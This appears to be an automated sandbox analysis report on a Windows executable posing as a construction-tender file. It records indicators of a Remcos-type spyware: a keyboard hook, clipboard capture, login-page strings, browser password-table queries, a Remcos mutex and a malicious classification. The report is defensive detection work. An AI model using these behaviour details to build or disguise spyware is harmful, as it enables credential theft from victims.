              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000003.2220871776.000000000062D000.00000004.00000020.00020000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000003.2220824366.000000000062D000.00000004.00000020.00020000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000002.2221660985.000000000062D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
              Source: bhv4333.tmp.5.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: bhv4333.tmp.5.drString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
              Source: bhv4333.tmp.5.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: bhv4333.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
              Source: bhv4333.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2.css
              Source: bhv4333.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qo
              Source: bhv4333.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
              Source: bhv4333.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2.js
              Source: bhv4333.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
              Source: bhv4333.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
              Source: bhv4333.tmp.5.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
              Source: bhv4333.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
              Source: bhv4333.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=27ff908e89d7b6264fde
              Source: bhv4333.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=586ba6
              Source: bhv4333.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=7ccb04
              Source: bhv4333.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=b1ed69
              Source: bhv4333.tmp.5.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
              Source: bhv4333.tmp.5.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
              Source: bhv4333.tmp.5.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
              Source: bhv4333.tmp.5.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
              Source: bhv4333.tmp.5.drString found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
              Source: bhv4333.tmp.5.drString found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
              Source: bhv4333.tmp.5.drString found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
              Source: bhv4333.tmp.5.drString found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
              Source: bhv4333.tmp.5.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000002.2205246174.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: bhv4333.tmp.5.drString found in binary or memory: https://www.office.com/

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe Code function: 0_2_00405373 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe Code function: 5_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe Code function: 5_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe Code function: 6_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe Code function: 6_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe Code function: 7_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe Code function: 7_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard

              E-Banking Fraud

              Source: Yara match File source: 00000004.00000002.2943881499.000000000246B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.2942457183.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe PID: 7864, type: MEMORYSTR
              Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe Code function: 5_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe Code function: 5_2_00401806 NtdllDefWindowProc_W
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe Code function: 5_2_004018C0 NtdllDefWindowProc_W
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe Code function: 6_2_004016FD NtdllDefWindowProc_A
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe Code function: 6_2_004017B7 NtdllDefWindowProc_A
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe Code function: 7_2_00402CAC NtdllDefWindowProc_A
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe Code function: 7_2_00402D66 NtdllDefWindowProc_A
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe Code function: 0_2_0040335A EntryPoint,LdrInitializeThunk,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,LdrInitializeThunk,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe Code function: 4_2_0040335A EntryPoint,LdrInitializeThunk,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,LdrInitializeThunk,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: String function: 00416760 appears 69 times
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: String function: 00402B3A appears 49 times
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000000.00000000.1693249370.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameadiaphanous.exeh$ vs Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000003.2197957468.0000000032C61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000003.2201620011.000000000247A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000003.2224697447.000000000249D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000000.1961768711.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameadiaphanous.exeh$ vs Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000003.2224617970.000000000249A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2967580790.000000003329B000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeBinary or memory string: OriginalFileName vs Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000000.2201806591.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameadiaphanous.exeh$ vs Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000006.00000000.2202013252.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameadiaphanous.exeh$ vs Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeBinary or memory string: OriginalFilename vs Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000002.2205246174.000000000041B000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000000.2203046854.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameadiaphanous.exeh$ vs Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeBinary or memory string: OriginalFilenameadiaphanous.exeh$ vs Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@9/18@1/3
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,5_2_004182CE
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 7_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,7_2_00410DE1
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 0_2_00404635 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,LdrInitializeThunk,SetDlgItemTextW,0_2_00404635
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,5_2_00413D4C
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 0_2_0040206A LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,LdrInitializeThunk,0_2_0040206A
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,5_2_0040B58D
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-UOMZ21
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile created: C:\Users\user\AppData\Local\Temp\nsk7B8E.tmp
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSystem information queried: HandleInformation
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2967335152.0000000033190000.00000040.10000000.00040000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000002.2221996854.000000000276A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeReversingLabs: Detection: 21%
